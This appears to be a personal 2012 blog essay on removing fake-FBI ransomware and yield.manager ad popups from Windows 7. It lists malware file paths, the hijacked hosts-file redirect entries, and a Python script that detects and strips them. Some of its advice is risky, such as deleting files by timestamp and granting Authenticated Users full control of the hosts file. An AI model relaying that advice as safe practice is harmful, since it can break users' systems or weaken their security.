       Final clean up (still in safe mode) involves a registry search using text fragments from the virus file names (like 'isass') using Windows' Regedit. Sometimes it finds something suspect in the registry and sometimes not. One online site recommended a general free cleanup tool called CCleaner. In one fell swoop this program will delete dozens of temp Windows files and browser history files. Maybe not necessary, but it seems like good practice. It's fast and easy and has not given me any problems. Finally empty the Recycle Bin and immediately reboot. It's important to clean out the Recycle Bin, because I think some viruses can reload themselves from there. Everything should be back to normal.
-------------------------------------
Detail notes
     Unlock: F8 on reboot to enter Safe mode (no network)
                   I read that another way to get rid of the FBI screen is to disconnect machine from internet (pull cable), because the FBI
                       splash screen is not on the computer, it is being downloaded at startup (I don't think this is true)
        Fix:  run Malwarebytes Anti-Malware (free)    --- Disables the virus
                Or  --- before deleting with Malwarebytes, use explorer to find the times these files were installed. This is time of
                       attack. Search out other files with same file date and time (I use file search utility: Agent Ransack.)
                       This part is tricky, but delete suspect files with these same times.
                CCleaner from Piriform (free) --- general clean up utility, not specifically for this virus. Use it to clean
                       out browser history and empty Recycle bin
         Another possible fix is 'System Restore' if it has a restore point and will work! My experience with System Restore on
                                Windows7 has been bad, and I read it may not work, but others report it has worked for them.
                                 This is the Win7 System Restore file (open it to start system restore): C:\windows\system32\rstrui.exe
----------------------------------
(another update, Sept 26, 2012)
         I have gotten hit with this virus still again (or it is hiding and just returns). This time I recovered by deleting dozens of files with time stamps within a couple of minutes of the attack. This time I used Malwarebytes only to find two key files (it misses some files) and from them got the exact attack time. There is info on this virus on the (real) FBI site. It says you do not have to open a file to get infected, just browse to the wrong site. The FBI page identifies the virus as being installed by "Citadel Malware" (sold on the open market by Russian hackers) and it installs a program identified as "Reveton Ransomware". Citadel Malware does its work by exploiting a vulnerability in Java. (Interesting: Firefox just popped up a window saying 'Java Platform SE7 U5 10.5.1.255' has been known to cause security problems and suggests disabling it.)

Details on virus
       A Google search led me to the first site below, which has a lot of detail as to how the virus operates and what files do what, very useful. They (Anvisoft) have a (free) program (2nd link) that they say deletes the virus: 'Anvi Smart Defender'. Here is their outline, and I can (to some extent) verify this since I just recovered manually today and kept notes on the files.

The reference identifies these virus files:
1) Delete   *.dll.lnk       in   C:\users\Window_7\Appdata\roaming\Microsoft\Windows\Start Menu\programs\startup
2) Delete   ctfmon.lnk      in   C:\users\Window_7\Appdata\roaming\Microsoft\Windows\Start Menu\programs\startup
                 yes, I found in this directory: ctfmon.lnk    1k
                 "This calls virus on startup", or it points to it so it runs.
         I also had:    CTFMON.exe-[random].pf   25k     in   c:\windows\prefetch
                        Isass.exe                44k     in   c:\programdata    (identified by Malwarebytes and related to ctfmon)
         (probably)     gla.pad                  81 Mb   in   c:\programdata    (dated 4 min later, but huge file)
3) Delete   rool0_pk.exe    in   C:\users\Window_7\Appdata\local\temp           "fixes the FBI moneypak"
            [random].mof    in   C:\users\Window_7\Appdata\local\temp
            V.class         in   C:\users\Window_7\Appdata\local\temp           (for good measure, a Java file)
   (I didn't have any of the #3 files)

ctfmon notes
        I have no doubt the ctfmon.lnk (1k) in the directory shown above is a key virus file. However, a Google search and a search of my c:\ drive show multiple copies of ctfmon.exe (9 or 10k), which Google says is a Microsoft file. In my cleaned system I do not find ctfmon.lnk.

        forums.anvisoft.com/viewtopic-45-953-0.html

more manual delete info here
       http://deletemalware.blogspot.com/2012/07/remove-fbi-moneypak-ransomware.html

I have not tried this cleaner
       www.anvisoft.com/product/smartdefender.html?refer=forums
----------------------------------
(update Sept 2012)
        Incredibly I got hit with this virus a 2nd time, about six weeks later. Same routine, computer suddenly (after some delay) locks with FBI splash screen. Reboot in safe mode (F8) and run Anti-Malware to kill virus. This time I checked YouTube and found a bunch of fixes for this virus. One was manual showing entries in registry to check, another recommends the utilities above. I also did some manual file deletes (using 'Agent Ransack', an excellent free search utility) for files dated within a few seconds of the bad files found by Malwarebytes.
--------------------------
        In Aug 2012 my computer was suddenly taken over by a virus that orders you to go to a store and send someone a bunch of money to unlock it. This virus is nasty: it throws up a detailed large splash screen (with an FBI logo no less!) and totally disables the computer. The trick to regain control is to reboot hitting F8 to come up in safe mode. Choose 'Safe mode with networking' as this provides access to the internet.

        I rebooted into safe mode and, knowing exactly when it had hit, started looking for files with that time stamp to delete. My history has been that manual virus recovery rarely works anymore, viruses are too good at hiding, but I did make some progress and must have knocked out some of its files, because I at least got the computer unlocked and usable, though clearly still sick. A little searching found reference to the virus and a recommendation for Malware Bytes. I was familiar with this program as it is one of several virus programs I had previously, but all were lost in my April 2012 crash and were never replaced. Malware Bytes has cleaned my machine. The only residual problem I have is that I myself deleted two files with odd names and the virus time stamp, and now on boot up I get dinged that these two files are missing, which I suppose may mean some residual of the virus is still in my machine and looking for them at boot.

Adobe's fault?
        I read that this virus is (pretty much) Adobe's fault in that their update program had a defect that the virus people exploited. I can believe this as just before the virus hit, an Adobe update screen appeared. I later suspected the Adobe screen might have been fake, but it fits with the scenario that this was the vector by which the virus got in.

        Later I found several YouTube videos on the virus. The video at the first link is pretty much a joke (unviewable with no narration), but in the text the details of the virus and recovery are laid out for a manual recovery, including registry keys to delete. I did not use this, I used Malware Bytes, so I don't know if it's right, but it looks authoritative. I did check several of the registry items you should delete and found none, which is good. Also in one of the comments a guy says he called his ISP after he got hit, and they recommended the program I used (Malware Bytes).

        The 2nd link is a YouTube video that shows recovery using Malware Bytes and clean up with a 2nd free utility, CCleaner from Piriform.
        http://www.piriform.com/ccleaner/download

http://blog.yoocare.com/computer-locked-by-fbi-moneypak-virus-asking-to-pay-200-fine-to-unlock/
http://www.youtube.com/watch?v=pdUrMr0UqWc

My fake FBI warning screen (Oct 2012)
        On a recent attack I grabbed my tablet computer and photographed my fake FBI warning screen on my locked computer.

        Notice the blank green area in the upper right corner labeled 'video recording ON'. I read that if your laptop has a webcam (I have no webcam), the picture from your camera shows up here. Nice touch. Notice also you are instructed to send "200$". Almost no one in the USA writes a dollar amount with the dollar sign at the end. And there are odd phrases like "fine of two to five hundred minimal wages", "deprivation of liberty". From all this there is little doubt that whoever wrote this screen is not a US resident or native English speaker.



FBI Lock virus lock screen (captured Oct 2012)

A different attack


Lock screen of the new nastier variant FBI Lock virus (captured Dec 24, 2012)
Hands in handcuffs -- nice touch
In Article 1 paragraph 'minimal' => 'minimum'

Advanced methods (from link below) for fighting FBI Lock virus (Dec 24, 2012)
        -- * If Windows’ Safe mode brings up a black screen, with “safe mode” in the four corners – Move your cursor to the lower left corner, where the Search box is usually visible in Windows Start Menu and it will come up, including the “Run” box. (haven't tried this, but if it works, this is helpful) (I later tried this on the 'black' Safe mode screen I forced, and as I suspected it does not work, no menu comes up.)

        -- * To get to 'System Restore' from 'Safe mode with command prompt'. Type in command line:
                            explorer                                                  (press Enter)    (do it fast, in only 2-3 sec virus may block typing)
                             (my suggestion here is try Ctrl-Alt-Del, or type 'exit' then Ctrl-Alt-Del, to get to Task Manager)
                            (There's also a problem with just typing 'explorer' in the Safe mode command window. I tried it, and it doesn't
                                work, it just brings up the Safe help screen. The command window defaults to the c:\windows\system32
                                folder, but explorer.exe is in the directory above it (c:\windows), so type 'cd..', then 'explorer'. This also works: close the
                                help screen window, then type 'explorer' a 2nd time.)
              in explorer navigate to:
                            c:\windows\system32\rstrui.exe                 (press Enter)   (This is System Restore, not best choice)

        -- * At boot the virus is called by a link (or shortcut) often called 'ctfmon.lnk' in Startup folder:
              (Important, the virus file is not 'ctfmon.exe' which is a system file!)
                            c:\users\Windows_7\Appdata\roaming\Microsoft\Windows\Start Menu\programs\Startup
                           (In my uninfected machine the only file in this folder is 'desktop.ini')

        -- Flash drive option:   (have not tried this, but it is simple if it works. I am however doubtful that a USB file is going
                   to load and run) "On another (clean) computer, download Malwarebytes and load the Mbam-Setup.exe
                    (or similar) file onto the flash drive. Remove the flash drive from the clean computer and insert it into the
                   affected machine, proceed to install Malwarebytes using the setup file located on the flash drive."

                    I have put Malwarebytes on a flash drive (more than the .exe was required), so if I remember I might try this
                    the next time I get attacked. In normal operation Malwarebytes runs OK from USB flash memory. (One problem I see
                    with this method though is that the Malwarebytes database is going to be out of date.)

        -- Remove hard drive and fix it remotely using a 2nd machine
                    A last resort, because it is a lot of work. The reference I found called for taking out the internal hard drive, moving a jumper
                    to make it a slave drive (IDE only, not SATA), then installing it internally in another machine to work on it, but this is
                    doing it the hard way.

                    Instead just use a drive conversion kit (power supply and cables, I bought one for $10) to convert an internal drive
                    to a USB drive, then clean it on a good machine and reinstall.

        --  I read the FBI lock virus is exploiting a vulnerability in Java

These tips from this detailed FBI lock article (Dec 2012)
            Although this reference is very comprehensive, with seven different ways of attacking the FBI virus, they do not include my favorite method of doing a time window search using Agent Ransack to find the virus files. Nor do they mention the Ctrl-Alt-Del to Task Manager method to get to explorer in damaged Safe mode with a black screen.

         http://botcrawl.com/how-to-remove-the-fbi-moneypak-ransomware-virus-fake-fbi-malware-removal/

Updates (12/29/12)
        After finishing this essay, I got hit by a new variant of the FBI lock virus; luckily it shares the same flaws as the standard FBI lock virus, to wit, control can be regained by booting into Safe mode, and the virus locks the computer within seconds of downloading. The screen is a little different, featuring 'Dept of Justice'.

        The big difference is that while the virus .exe file is in the usual size range, here 211k, it also downloads a HUGE file of 92 Mbytes. God knows what this huge file would do. Its other distinctive feature is its filename. The .exe file has what looks like a random letter file name ('wgsdgsdgdsgsd'), but the 92 Mbyte file uses exactly the same letters in reverse order. A Google search of the .exe filename gets a lot of hits. MalwareBytes labels the files of this virus:

                     Trojan.Ransom.SUgen
                     Trojan.FakeMS
                     Exploit.Drop.GSA
===============================================================================================

Overview of several virus fixes (12/2/12)

        In fighting an infection by the nasty 'yield.manager' (and its related family), which repeatedly pops up ads covering web sites, I got further infected by aggressive ad programs riding on the installers of (supposedly) free anti-malware programs. These parasitic programs installed aggressive toolbars ('IB Updater' and 'Incredibar') on several browsers, in my case Chrome and Mozilla Firefox. Somehow, in working to delete all this crap, and maybe in fighting the FBI lock virus, two Windows tools essential to fighting viruses got damaged: the Windows registry editor tool 'regedit' would not run, and the Safe mode screen icons disappeared, leaving a black screen.

        After ten days of work, I think I have fixed all (or most) of these problems. The nasty toolbars that attached themselves to Chrome and Mozilla are gone. Regedit now runs and works fine. Safe mode icons are back too. It's hard to say the popups are 100% gone, but on favorite sites that had popups every minute, I have not seen a popup in several days.

        Of course, it's a given that all files, directories and registry entries that can be found are deleted. This pretty much handled my last attack, the nasty browser toolbars. The toolbar installer sprayed dozens of entries into the registry. Keyword searches of the registry with regedit located the file locations. By hand I deleted the files and the dozens of registry entries. The browsers also helped. Mozilla threw up a screen saying the newly side-loaded toolbar was causing instability and asked that it be disabled. It said it could not delete it, because it had been universally loaded. In Chrome I was able to disable the aggressive toolbar too. But this approach didn't work with the popup ads; more was needed, and, of course, more was needed too to fix regedit and Safe mode.

        Here are the key fixes:

               1) Microsoft System File Checker
                            Restored 'Regedit' and 'Safe mode' to their original state. Is 'System File Checker' another
                                  Microsoft hidden gem? (It gets good reviews.)
               2) 'Hosts' file edit ---  (c:\windows\system32\drivers\etc\hosts)
                            A vital part of the yield.manager virus strategy appears to be that it edits the system 'Hosts' file
                                 (used in translating host names to IP addresses) such that it redirects to ad sites. The
                                 few lines the virus adds to this text file are hard to find and totally cryptic, so you need
                                 to know what you are looking for. Also Hosts is a hidden, protected system file that is
                                 very difficult to change. Cleaning up the Hosts file appears to have removed the popup
                                 'x' frames.
               3) Browser site blocking
                            Block the sites from which ads are pulled. This is not a clean fix for popup ads but helps,
                                  because more often than not the popup ad window goes transparent, with just a frame 'x'
                                  remaining.
=============================================================================

Details on how to kill annoying popup ads --- from Yield.manager
                    created Nov 21, 2012

      All of a sudden a week ago I started to get a lot of really annoying popup ads that cover part of the screen, usually the lower left corner. They all have the same frame with a window close 'x' projecting in the upper right. They are not browser specific. Chrome shows the same popup frame as Opera. They only seem to show up on some sites (reliably on Andrew Sullivan). When one pops up and you close it, a few minutes later another pops up. They are not stopped by my browser popup setting (block 'unwanted' popups), and even setting it to 'block all popups' does not stop them. In one case, Andrew Sullivan's blog site, a lower left corner window ad would repeatably pop up with a 7 sec delay after a page reload. A little research shows these annoying popups are associated with 'yield.manager', and sure enough I find my browser has a cookie from 'yield.manager'.

Overview
        It took a lot of work and several false starts, but I finally got rid of the annoying popup ads from yield.manager. This attack is known to be a bitch, and none of the anti-malware tools I tried could touch it. Online you are told to fight this infection by deleting ad cookies, but this is a waste of time. Ad cookies are written all the time; deleting them does no good, they're soon back. Other sites say to disable 'javascript', because the popup windows are called by javascript code. Sure enough disabling javascript gets rid of the popups, but it messes up so many sites that it is not a practical fix.

        I did get some partial success in blunting the attack by having my browser block the handful of sites from which the ads are pulled. This often, but not always, made the popup window, which is still there(!), transparent. Later I learned the yield.manager virus is known to add redirect lines to the hidden system file called 'hosts', and this I found was the key. After I undid the damage the virus does to the 'hosts' file, I found the popups were completely gone.

How to get rid of 'yield.manager' popups
        I finally came up with a clean fix to the popup problem, fix the 'hosts' file. It may not be at the root of the popup attack, but it appears to be a key component. I find fixing the 'hosts' file gets rid of the popups (frame and all). 'Hosts' is a hidden system file at the location below. In the same directory is the file 'hosts.txt', but the file that has been corrupted and needs to be fixed is the file 'hosts' (with no suffix).

                c:\windows\system32\drivers\etc\hosts

How to fix 'hosts' file
        The yield.manager virus adds some (URL redirect) lines to the 'hosts' text file that are easily missed as they are preceded by hundreds of blank lines. Since 'hosts' is a text file, it can be edited with Notepad. Delete the added lines. This file should have only two active lines and be the same as the 'hosts.txt' file. Now comes the tricky part: getting permission to write the new file. The virus makes this difficult, because after modifying the file it has tightened the file permissions.

** This works to rewrite 'hosts' file! (12/6/12)
        The recommended procedure online is often just steps 2) and 3) below, but I (and some others) have found this to be unreliable. What works for me is to first loosen file permissions as shown in step 1).

        1) Change 'hosts' file properties first
               Properties, Security ("Authenticated Users"), Edit, Full Control, Apply, then unclick Read-only
        2) Notepad (run as administrator) can now overwrite 'hosts'
        3) May need to save file as "hosts" (with quotes, to prevent '.txt' suffix from being added)

'Temp34.exe' Trojan Lameshield
       Possibly related to the popups (maybe its root source) is a virus file 'Temp34.exe', which Malwarebytes identifies as 'Trojan Lameshield'. I found it on my machine, and it had started running a process called 'temp34.exe *32', which was visible in Task Manager. Fix is delete file and in Task Manager (Ctrl-Alt-Del) kill any process with a similar name it has started running.
------------------------
Detail notes
        From examining the html code I found that the popups are javascript code that loads from the web the frame (http://content.yieldmanager.edgesuite.net) and its contents (http://ad.yieldmanager.com). The Opera browser can disable javascript, and I find this kills the popups, but unfortunately 'javascript disabled' is not a practical setting as it messes up far too many sites, in particular, financial sites I use everyday become unusable.

        I have made some progress against the popups by having Opera block the content from the half dozen or so sites that source the frame and content. At some sites, like Andrew Sullivan, the popup is reduced to nothing but a tiny black 'x', a minor annoyance. In this case the frame must be either missing or transparent, but on a few sites the window remains a pain, showing as an opaque white block. I get the site to block from the properties (and html code) of the popups. In Opera they are listed at [Tools, Preferences, Advanced, Content, Blocked Content]. Popups can also be right clicked, and from the menu choose Block. This causes the site to be entered into the browser block content list.

        Try as I may (spending mucho hours over 2-3 days) I have been unable to find the root calling program. I delete cookies, clean out everything, search the registry, and a little while later the popups and the same cookies are back. Either something remains on my machine I can't find or some site I commonly use is reinfecting me with these ads. (This comment was written before I discovered the 'hosts' file changes were connected with these popups.)

Blocked sites
        This list of blocked sites works pretty well.

                    http://ad.yieldmanager.com/*
                    http://ad.yieldmanager.net/*
                    http://yieldmanager.com/*
                    http://yieldmanager.net/*
                    http://content.yieldmanager.com/*
                    http://content.yieldmanager.net/*
                    http://content.yieldmanager.edgesuite.com/*
                    http://content.yieldmanager.edgesuite.net/*
                    http://static.exoclick.com/*
                    http://static.exoclick.net/*
                    http://chitika.com/*
                    http://scripts.chitika.com/*
                    http://scripts.chitika.net/*

                    http://doubleclick.com/*
                    http://doubleclick.net/*
                    http://adbrite.com/*

                    http://ad.doubleclick.net                             (obtained from Sullivan code)

Comments
        -- 'goarticles' (client) is associated with chitika
        --  exoclick site is images for IRC channels
        -- blocking site 'http://ad.doubleclick.net' (obtained from Sullivan code) is OK, it just blocks several (full width) ads for Slate computer.

Good reference (about yieldmanager popups)
         http://deletemalware.blogspot.com/2010/08/how-to-remove-adyieldmanagercom.html

        "Basically, you need to delete existing ad.yieldmanager.com cookies and then block third-party cookies from yieldmanager.com in your web browser. Here's the official YieldManager's opt-out cookie which stops the ability to keep track your browsing information: http://ad.yieldmanager.com/opt-out"

Popups appear to be site related
        On closer look popups appear to be site related. I never see them on my home page or the newspapers NYT & WP, yet they show up (in transparent form) on Sullivan. A look at the Sullivan code shows that site is using some cookie tracking (doubleclick?) code, probably to place ads, maybe tailored to personal tracking. I now suspect the site's code is somehow linked in to my lower left popup windows (which would be the wrong location on the site for ads, as it covers content).

Sullivan site code (with popup)
        The popup is 300 x 200 in size. A search for 300 on the page yields the code below. Note it's being called by 'http://ad.doubleclick.net' (This is Chrome browser with no blocked site, yet curiously I am getting the same transparent popup with 'x'.)

<div id="speedbump1"></div>
<script>
$(function() {
   // ad request URL; the random 'ord' value is a cache-buster so every load fetches a fresh ad
   var url='http://ad.doubleclick.net/adj/5480.iac.thedailybeast/dish;tile=2;sz=300x250;ord=' + (Math.random()*10000000000000000) + '?';

   writeCapture.writeOnGetElementById = true;
   // the script tag is split into string pieces so the page's own HTML parser does not see it
   var content = writeCapture.sanitize("<scrip" + "t src='" + url + "'><" + "/scri"  + "pt>");
   $("#speedbump1").html(content);
});
</script>
------------------------------
Right click the popup
        By right clicking the popups they seem to be of two types: some images downloaded (with the URL shown by right clicking) and others, even though they look like static images are very different, they have Flash settings. I used my three malware programs, which all came up negative. My good search program found some of the file and source names, and I deleted these files and cookies. My general cleaner program also found the same file and source names, and I used it to do mass deletions. These would seem to help for a while (maybe a few min to hour), but pretty soon the popups were back.

        Browsers can block sites, so even though far from ideal, one way to battle the downloaded images, which I have seen recommended, is to enter the source URLs into the block list. In the Opera browser the place to enter URLs to be blocked is below. (Another way to do it is just right click the popup and choose 'Block content' from the menu.)

            Tools, Preferences, Advanced, Content, Blocked Content

Here are the (root) addresses I am currently blocking, all of which were obtained from my popup addresses: (I am going to see if this works)

        http://content.yieldmanager.edgesuite.net
        http://yieldmanager.net                                          (yieldmanager.net is a cookie)
        http://scripts.chitika.net                                       (http://scripts.chitika.net/static/css/goarticles550x250.css)   ('goarticles' is client)
        http://static.exoclick.com
                 Exoclick says it is an IRC-channel image cache ... "This site only takes links to images from IRC-channels and downloads the image to this cache!" It has an index showing it has thousands of images of all kinds.

Not browser specific
        This is not an Opera problem. The same popups appear on Chrome.

Chrome provides a lot of tools to look at the html code:

             script                                 javascript                                                         (can javascript be disabled in Opera? yes under Content)
             popup src (source)           http://ad.yieldmanager.com                                          (suspect this is the key manager)
             frame src (source)             http://content.yieldmanager.edgesuite.net/atoms/         (height=250, width=300)
             ????                                  http://dg.specificclick.net

Controlled test of javascript on/off
        I finally came across a reproducible way to bring up a popup. A popup appeared on the Sullivan page, so reload the page (don't scroll) and the popup reappears in 7 sec! Works every time. Now I am going to disable javascript (under Content) and see what happens. No popup! Re-enabling javascript. Yes, popups are back, and I also see from the reload indicator on the bar that reloading is delayed by 10 or so as the browser goes out to download the damn popup window! Disabling Javascript again. Popups gone!

Kill the popups
        After 24 hours' work I have figured out how to fully get rid of the (lower left corner) popups. Whether this is a practical fix remains to be seen (it's not!). An examination of the popup code shows the script producing the popup ad is 'javascript' code. It calls several URLs (starting at http://ad.yieldmanager.com) that set up the frame, its size and the ad content. Javascript can be disabled in my browser, and an on/off test showed at least one popup (in Sullivan) came and went every time. Thus it appears javascript controlled popup ads can be removed by:

                    Disable Javascript            (in Opera: Tools, Preferences, Content, Enable javascript on/off)

        There are javascript option settings too, but the only one I thought might work (detect context) didn't work. I have read online that javascript is not very important and can be turned off. But the 64 dollar question is what else will now not work? Is it practical to leave it disabled?

        BAD NEWS  -- Tiaa-Cref and Vanguard both require Javascript enabled!

Very interesting -- partial fix
        Within minutes of blocking the three sites above (and deleting the Opera cookie 'yieldmanager.net') I see something very interesting. The block is a partial fix. On my screen in a fixed location is the lower left corner delete X (small black circle with an 'x'), but that's all! Apparently the calling program (trojan) is writing the 'x', but the (opaque) screen never loads, so the whole screen remains normal except for a superimposed 'x'. Or maybe Opera lets the 'x' through, so you can click on it to see there is blocked content.

Full fix?
       Right clicking the first two floating 'x' I see and then choosing Block site, up comes a screen that tells me the image is blocked. In upper right when I click Details it tells me the image was blocked from 'http://content.yieldmanager.edgesuite.net'. The Opera blocked info window gives me the option to click on the 'blocked image box' to block future images from this source. So I do and it changes from grayed out to not grayed out. (Never worked this way again!) With that change sites formerly ad infected have been totally clean for the last couple of hours. Fingers crossed. Nope, 'x's are back, but still it's progress since no popups.

Simpler way to block sites
        Instead of typing in the URL of the site to be blocked Opera will do it for you. When a popup comes up, right click popup, choose the 'Block content' from menu, then tell Opera to block content from this site. Opera adds the URL to the block list.

Cookie deletions
        By right clicking popups I assembled a list of half a dozen or so key words. When I checked the Opera (very long) cookie list I found several of my keywords. I probably should just have deleted all the cookies, but I started out with selective deletions. I found the suspicious cookies in several groups. I deleted all below that were on my list. Since cookies that start with ad. or ads. inherently look like advertising and two of them I know are associated with my popup eruption, I deleted all the cookies beginning with 'ad'.

               http:/yieldmanager.net
               http://static.exoclick.com
               ads.crackmanager
               ad.yieldmanger.net
               (adxxxxxxxxxxxxx)

        Within an hour of deleting the above cookies and meanwhile only visiting a few trusted news sites I find the cookie 'ad.yieldmanger.net' is back! And not surprisingly the URL of a new popup includes 'yieldmanger.net'. This cookie has four components which are just long random names, but the properties of these can be looked at. When I do, I find they have times (to the second), and one is just a few minutes ago when I was reading news. I do a search around the cookie time window to see what files have been written. Find nothing at exactly this time and nothing definitive, however, the two large files AgGIUADxxxxxxx I keep deleting are back. This time I am deleting all Opera's cookies, then I can see more easily when new ones get written.

        Looking at my recent browser history, which seems to include all the redirects that occur, one below stands out as suspicious. This is a site I know nothing about, and when I push into it there is 'ad.yieldmanger'. 'yieldmanager' is the common keyword attached to the popup windows. I read it's not uncommon for trojan sites to pretend to be spyware removal sites.

                        spywareremove.com                                     (www.spywareremove.com is a recent cookie)
                             Remove ad.yieldmanager.com

        Google search not conclusive, but one 2009 report has a poster on Norton saying this site is not legitimate. I went on the site, and its voice pitch certainly sounds like a scam!

        Cookie settings: I had Opera set on Accept cookies, so I changed it to a slightly more narrow, Accept cookies from sites I visit. I temporarily clicked Ask me before accepting cookies.

        Cookie delete: I can't find any Opera tool to delete all cookies, which is strange, or any easy way to do it. Maybe CCleaner can do it. Yup, it tells me I have nearly 400 cookies and it can delete them, so I am doing that along with having it clear Opera history and icons, etc. Sure enough Opera cookies nearly blank except for a few mail sites that I manually deleted. So cookies now blank and I am supposed to be asked before any site (I visit) deposits one. Yikes, my first click to NYT and it deposits not one, but a whole bunch including one with the word market in it. I am going to have to delete the request, because I can't browse with repeated cookie requests. I will instead enable Delete recent cookies on exit. (I later abandoned 'delete recent cookies' too, because although it seemed that settings and logon names should be retained, they weren't and I had to keep retyping them which was too much of a pain.)

        One click to NYT causes 13 cookies to be deposited under several different headings!!!

        Yikes, even starting with totally blank cookies, a single click on Andrew Sullivan gives (as before) a partially blocked (yieldmanger) popup. A bunch of cookies show, but nothing suspicious. It doesn't look like cookies are the driver! A registry search for yieldmanager comes up null.

Curious
         Even from a clean Opera (and a reboot) I still get partially blocked popups, but I notice two things that are curious. It seems that only some sites trigger the popups; one that reliably does is Andrew Sullivan. I have to scroll some for the popup to show. The other curious thing is that on Sullivan the blocked popups are always transparent (only the 'x' shows), but on other sites the blocked popups are white opaque blocks.

Hosts hijack
        I am beginning to suspect strongly that the ad popups are tied in with redirects in a 'hosts' file. I read the purpose of this text file is to list redirect URLs when incorrect URLs are entered, but this can be hijacked by viruses to do hijacks. HijackThis tool always reports that it can't open the Host file, which it suggests is at

        c:\windows\system32\drivers\etc\hosts

        HiJackThis implies that hosts has 8 very suspect redirects to two IP addresses with these three names:   www.google-analytics.com, ad-emea.doubleclick.net, www.statcounter.com

               50.31.74.129
             217.23.13.202

        Sure enough when I google on the above IP addresses I find someone else has exactly the same eight entries under a title from a malware program "Hosts file hijack", but where is this file? When I look at the host.txt file in the above folder I find it is just comment lines with no body (and same for other hosts.txt files I find).

Host file (good) info
        http://answers.microsoft.com/en-us/windows/forum/windows_xp-system/how-to-fix-corrupted-etchosts-file/828b55b2-352f-43ed-b8a3-a77b25c58d6d

Microsoft says this is a hidden text file, which can be hijacked and can be user edited (with notepad).

Unhiding
        OK, progress. Even though I routinely have checked 'show system files', there is another entry in Organize\Folder and Search Options\view\.  This is 'hide protected operating system files (Recommended)', which when I uncheck brings up a file in the above folder just named:

            'Hosts' (not host.txt) in c:\windows\system32\drivers\etc\         folder

        This is the file to edit!  Damn, Notepad shows nothing interesting in 'Hosts' and even though Hosts is 2k vs the host.txt which is 1k, both files look exactly the same in Notepad (unless there are hidden lines). Try the filename 'localhost', it looks like 'host' might redirect here. (At this point I have not yet discovered the virus's trick of hiding the added redirect lines by also adding hundreds of blank lines.)

Fixed Hosts
        I hope I have fixed the 'hosts' file to which the ad trojan had added redirect lines. c:\windows\system32\drivers\etc\hosts (no suffix) has had the offending text lines removed. However, it is now in Explorer labeled as a 'file', whereas the corrupted old hosts (renamed: hosts_old(infected)) is labeled a 'system' file.

        I finally stumbled on the redirect lines in the Hosts file, and after a lot of screwing around, figured out how to write a new Host file. The new 'hosts' file has the six redirect lines (50.31.74.129 and 217.23.13.202, each labeled: www.google-analytics.com, ad-emea.doubleclick.net, www.statcounter.com) deleted.

        1) I found the virus guys had hidden the six new ad redirect lines by the simple strategy of putting in hundreds of blank lines between it and the sample text, so it was a long scroll down. The only difference in appearance between the modified host file and host.txt (sample) is scroll bars appear.

        2) In Notepad it was trivial to delete the virus added redirect lines, but I found it impossible to save the new file. Notepad insisted on writing it as 'hosts.txt' rather than 'hosts'. Also could not rename the files. Not sure how I did it, but in Safe mode by various renamings I got the cleaned up txt file renamed 'hosts' and the corrupted txt file renamed 'hosts_old(infected)'; however, the system properties are not fixed, with the old file labeled a system file and the new 'hosts' file just a normal file. Not sure what this will do. (At this point I don't have a systematic procedure for fixing the 'hosts' file, because I didn't document my playing around and could never get it to work a 2nd time.)
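        The check the two steps above describe by hand (scroll past the blank-line padding, find the added lines, delete them) can be done by a script. The Python below is an added example, not code from this essay or from HijackThis: it parses a hosts file, reports every active entry that resolves a name to a public (non-loopback, non-LAN) address, measures the longest run of blank lines, and produces a cleaned copy with those entries dropped and the padding collapsed. The hosts text it scans is constructed here (the comment header is a stand-in for the Windows sample file); the two IP addresses and three host names are the ones reported above.

```python
import ipaddress

# Constructed stand-in for the comment-only Windows sample hosts file.
SAMPLE_HEADER = "\n".join([
    "# Sample HOSTS file (constructed stand-in for the Windows default).",
    "# Each entry: an IP address, whitespace, then one or more host names.",
    "# 127.0.0.1       localhost",
    "# ::1             localhost",
])

# Constructed copy of the hijacked file: the same header, then 300 blank lines
# (the padding trick described above), then the six redirect lines reported above.
REDIRECT_IPS = ("50.31.74.129", "217.23.13.202")
REDIRECT_NAMES = ("www.google-analytics.com", "ad-emea.doubleclick.net", "www.statcounter.com")
HIJACKED_HOSTS = (
    SAMPLE_HEADER + "\n" * 301
    + "\n".join(f"{ip} {name}" for ip in REDIRECT_IPS for name in REDIRECT_NAMES)
    + "\n"
)


def parse_hosts(text):
    """Return (line_number, ip, [host names]) for every active, non-comment entry."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # drop comments, including trailing ones
        parts = line.split()
        if len(parts) >= 2:
            entries.append((lineno, parts[0], parts[1:]))
    return entries


def longest_blank_run(text):
    """Length of the longest run of consecutive blank lines (the hiding padding)."""
    longest = run = 0
    for raw in text.splitlines():
        run = run + 1 if raw.strip() == "" else 0
        longest = max(longest, run)
    return longest


def is_local(ip):
    """True for loopback, link-local and RFC 1918 addresses, which hosts entries legitimately use."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # malformed address: do not treat it as trusted
    return addr.is_loopback or addr.is_link_local or addr.is_private


def audit_hosts(text, padding_threshold=20):
    """Summarise a hosts file: active entries, those pointing at public IPs, and padding."""
    entries = parse_hosts(text)
    suspicious = [(ip, names[0]) for _, ip, names in entries if not is_local(ip)]
    padding = longest_blank_run(text)
    return {
        "active": len(entries),
        "suspicious": suspicious,
        "longest_blank_run": padding,
        "padding_hides_entries": bool(suspicious) and padding >= padding_threshold,
    }


def strip_redirects(text):
    """Return the file with public-IP entries removed and blank padding collapsed to one line."""
    kept, prev_blank = [], False
    for raw in text.splitlines():
        stripped = raw.strip()
        blank = stripped == ""
        if blank and prev_blank:
            continue  # collapse the padding
        parts = stripped.split("#", 1)[0].split()
        if len(parts) >= 2 and not is_local(parts[0]):
            continue  # drop the redirect line
        kept.append(raw)
        prev_blank = blank
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    # To audit a real machine, read c:\windows\system32\drivers\etc\hosts instead of the sample.
    report = audit_hosts(HIJACKED_HOSTS)
    print(f"{report['active']} active entries, {len(report['suspicious'])} pointing at public IPs")
    for ip, name in report["suspicious"]:
        print(f"  {name} -> {ip}")
    print(f"longest run of blank lines: {report['longest_blank_run']}")
```

        The cleaned text still has to be written back with the permission steps described later in this essay (Notepad run as administrator after the file's security settings are changed); the script only tells you what to remove and gives you the text to paste.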

Aggressive Adobe Flash install is bringing in ad crap (12/4/12)
       Today got reinfected with more ad software crap that again changed (and locked) my 'hosts' file. Running HiJackThis it tells me it can't open 'hosts' file, and it shows the redirects added to the file. This time besides the old doubleclick, statcounter and google-analytics there are some new ones like facebook.

